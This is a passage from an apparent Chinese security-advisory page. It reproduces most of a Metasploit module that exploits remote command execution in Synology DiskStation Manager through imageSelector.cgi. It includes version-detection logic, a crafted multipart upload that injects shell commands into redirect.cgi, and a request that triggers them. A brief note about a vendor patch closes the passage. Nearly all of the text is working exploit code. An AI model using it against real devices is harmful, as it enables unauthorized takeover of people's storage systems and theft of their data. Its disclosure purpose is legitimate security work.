Synology DiskStation Manager 'imageSelector.cgi'远程命令执(2)

if res and res.code == 200 and res.body =~ DEVICE_INFO_PATTERN
      version = "#{$~[:major]}.#{$~[:minor]}"
      build = $~[:build]
      model = $~[:model].sub(/^[a-z]+/) { |s| s[0].upcase }
      model = "DS#{model}" unless model =~ /^[A-Z]/
    else
      print_status("#{peer} - Detection failed")
      return Exploit::CheckCode::Unknown
    end

print_status("#{peer} - Model #{model} with version #{version}-#{build} detected")

case version
    when '4.0'
      return Exploit::CheckCode::Vulnerable if build < '2259'
    when '4.1'
      return Exploit::CheckCode::Vulnerable
    when '4.2'
      return Exploit::CheckCode::Vulnerable if build < '3243'
    when '4.3'
      return Exploit::CheckCode::Vulnerable if build < '3810'
      return Exploit::CheckCode::Detected if build == '3810'
    end

Exploit::CheckCode::Safe
  end

def exploit
    cmds = [
      # sed is used to restore the redirect.cgi
      "sed -i -e '/sed -i -e/,$d' /usr/syno/synoman/redirect.cgi",
      payload.encoded
    ].join("\n")

mime_msg = Rex::MIME::Message.new
    mime_msg.add_part('login', nil, nil, 'form-data;')
    mime_msg.add_part('logo', nil, nil, 'form-data;')

# unfortunately, Rex::MIME::Message canonicalizes line breaks to \r\n,
    # so we use a placeholder and replace it later
    cmd_placeholder = Rex::Text::rand_text_alphanumeric(10)
    mime_msg.add_part(cmd_placeholder, 'application/octet-stream', nil,
                      'form-data;; filename="bar"')

post_body = mime_msg.to_s
    post_body.strip!
    post_body.sub!(cmd_placeholder, cmds)

# fix multipart encoding
    post_body.gsub!(/\r\n(--#{mime_msg.bound})/, '  \\1')

# send request to append shell commands
    print_status("#{peer} - Injecting the payload...")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'    => normalize_uri('webman', 'imageSelector.cgi'),
      'ctype'  => "multipart/form-data; boundary=#{mime_msg.bound}",
      'headers' => {
        'X-TYPE-NAME' => 'SLICEUPLOAD',
        'X-TMP-FILE'  => '/usr/syno/synoman/redirect.cgi'
      },
      'data'    => post_body
    })

unless res and res.code == 200 and res.body.include?('error_noprivilege')
      fail_with(Failure::Unknown, "#{peer} - Unexpected response, probably the exploit failed")
    end

# send request to invoke the injected shell commands
    print_status("#{peer} - Executing the payload...")
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri('redirect.cgi'),
    })

# Read command output if cmd/unix/generic payload was used
    if datastore['CMD']
      unless res and res.code == 200
        fail_with(Failure::Unknown, "#{peer} - Unexpected response, probably the exploit failed")
      end

print_good("#{peer} - Command successfully executed")
      print_line(res.body)
    end
  end
end

建议：
--------------------------------------------------------------------------------
厂商补丁：

Synology
--------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：